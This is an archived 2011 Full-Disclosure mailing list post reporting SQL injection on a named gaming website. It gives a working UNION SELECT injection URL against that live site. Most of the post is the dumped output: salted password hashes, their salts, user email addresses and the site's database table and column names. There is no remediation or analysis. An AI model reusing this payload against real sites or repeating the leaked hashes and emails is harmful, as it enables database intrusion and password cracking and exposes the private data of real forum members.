| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 13 Jan 2011 20:07:38 -0600
From: Bob Smith <bobbyhadababyitsaboy@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: rpgrevolution.com SQL Injection
/home/rpgrev/domains/rpgrevolution.com/public_html/
http://www.rpgrevolution.com/games.php?platform=all&genre=aaaaaaaaaaaaaaaaaaaaaaa'
union select 1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id
Salted
63217a559a7be4704156457c633c3344,4164d790f0047fc513b66ae1897bd6f2,16bd17aa7cb278c5520b021838a84a97,fe1d2c340c644126ba041bf0e97b7626,4263acb3502f6398ceb3841aa597fc5b,1da97968c870b5e8f4f8bd8897818056,5d9d9fa96b96c6c65b0673574a35453a,3f2e95b48762eb5b05f2424cfa80892a,6be4fb54d289d423ad69d9ef9b644156,731860ca22a89f0892a167f2afc81fa5,0b554ca29560318413f628347f46739b,07f2abe0dd2f40f0645e516f0f99325f,5f6ca10a7f1b0161acec092e4bee3c3c,1f2f49e8cf15428c350d96e2c2657d8b,c3d4f999324da31ee27cded6f9afde82,8787496111945c44e9d1bf62c43f9a40,5eaa772f28ca4c5832b997a6d24eb583,7e0e12c300b74661b6d6af08061d9363,0b2b5b1fb0dd8741328306b11166db63,57701c03e318d9fd39c56770b5f8a690,3dc61c20f521ead4381f02d9e99a0f46,e4a109ad7f09f3592b66c1ff3bce757b,562cd66fb31032973b116c4f5e9d01ac,a1815b2be6045fb98d850b96f0826ea3,d5234683d52606e67c9892c848a27eef,d2944383a1a72ae25b1dc49099ce0fa8,e161df49ddeda84829f2dd450a787632,d5be51ebf16f3768e52ca3ce7dc8372e,4a810955d9c4d9c956c14e8870c88338,615019960314d071fea6c37eaf363dca,
67539a45a48399e929963918277ab37f
Corresponding Salt
lNF@,,av7@e,zm?m/,~>H;<,EKu(h,#Z/q;,q$[Qc,9D.e},C|@;Z,E;hhO,eIG,u,+4Vqb,)p%/},q:Z{T,W'.Tj,THvsH,_f|+g,b[3tA,4%BuP,4n^n6,P(/.e,VliRl,xfA%a,U9Rce,C-JY3,qgoB~,|9P3Q,W],*`,$]S+G,Pz_Fw,:y@/,,5.LMi,>r1d?,krR)@,70=1|,}}~rI,|Hr[f,Xz)Db,KvXc^,h9'F},~J)er,J/QNO,F*I*O,43fh2,B3lLg,r|zjv,:mZ>j,MpLdR,$ScWu,MC7S[,F.LS.,xVToc,#vj?(,(5-R+,E:?p7,<8Mi{,s/%Z8,wb*zC,2W0Ag,H]%~{,68wdx,z3"Q),^Ir#6,girRW,xhd#j,d8`_x,]:9_z,-n3^b,L3z`0,U,~Jy,]{}:^,4+4<`,HdJ?B,uDjFw,%1MZF,q4{-N,w%d/:,9UXJ{,+2up5,V@Xul,L]M/5,G/&Vg,tZB<U,O}Wiu,pWy45,G:tw=,Ii%*9,PAstq,^J-O-,`9VS0,5pU}f,00|vf,B9*Td,jHrs=,lxEp3,?d#3J,@Lv2,,&]]R8,piB07,n3{(U,&oNQC,I8-*@,7H+b9,5tAce,RMJNT,aj%Wq,zru'0,cN%^m,u7@f4,P%/==,-IH/U,$iI8%,xp?NY,NAzQ9,=h.Xi,_n7P=,8IMKh,ej<]x,ZuWFg,oEe@1,n<^"],K!~[&,B|!{=,Gq9vP,7.-jc,i=c]q,"]']$,7I;]K,)zydA,v$/o?,`'z^f,`ug!),Mh+SM,]T,k9,x^T-!,U&.>M,Y51Vn,;@TW1,_]^H:,v^'E.,1_:;+,{ovD.,lF"^|,y`:v^,Gd4h|,Ju`/C,1UV/l,1J'*G,0m86q,qq!Xf,]S8h(,GWsR(,g[1<R,h#gGW,@?ecm,%oR&l,PA7K`,C3$*},@<dA@,]G83D,&;oJ<,hU)q{,T=}W~,5Nad],gI@eS,
MVA{D,%D`*M,JvDx[,.=&_E,Q>PLx,hlu4
minsu86@...il.com,cooldude2k@...il.com,sir.shaun@...il.com,psychoantwon@...il.com,jcink2k@...il.com,jonathan.pandgir@...il.com,renee2k@...il.com,stepan_par@....com,webmaster@...mrd.zzn.com,kumihosan@...il.com,josemmm@...ra.com.br,riou@...en24.com,ruze8890@...il.com,ivan_polanco18@...mail.com,gary@...dev.com,diana_sexylady@...mail.com,saboor_ryu@...mail.com,gf@...a.co.il,unconformist@...il.com,renate2k@...il.com,xsilverblade@....com,knigt2@...mail.fr,theomen9mm@...mail.com,eleven11@...l.com,klein.99@...il.com,nickctm@...il.com,game_boi_sp@...mail.com,when_is_now@...mail.com,tiggerville2929@...il.com,cyferki@...pl,guardian_drayal@...mail.com,hitman19@...nline.de,jayce@...inelegy.com,crprince@...us.net,jellyman@...rter.net,jellydude3443@...oo.com,ultrapokemaniac@...oo.com,nukehunter@...mail.com,hawkfire01@...mail.com,kekko90@...ceposta.it,bballtj93@...izon.net,zamual05@....com,memorym@...la.co.il,quickcutthroat@...oo.com,drew_samuelsen@...mail.com,cecilvanhelsing@...il.com,fresc
o_dewidt@...mail.com,
access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, -- id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users, --api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,ibf_arcade_news,ibf_arcade_scoreboard,ibf_arcade_sessions,ibf_arcade_sitngo,ibf_arcade_sitngo_plyers,ibf_arcade_tartemp,ibf_attachments,ibf_attachments_type,ibf_badwords,ibf_banfilters,ibf_bulk_mail,ibf_cache_store,ibf_cal_calendars,ibf_cal_events
ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_challenge_banned,arcade_challengeid,arcade_challenge,arcade_u_cha,arcade_session,arcade_time_spent,user_r_pp,jackpots_won,jackpots_points,arcade_won,arcade_spent,arca
de_activity,arcade_activitywon,user_u_columns,
ibf_sessions-id,member_name,member_id,ip_address,browser,running_time,login_type,location,member_group,in_error,in_dldo,in_dlcat,in_dlfile,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id,in_game
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists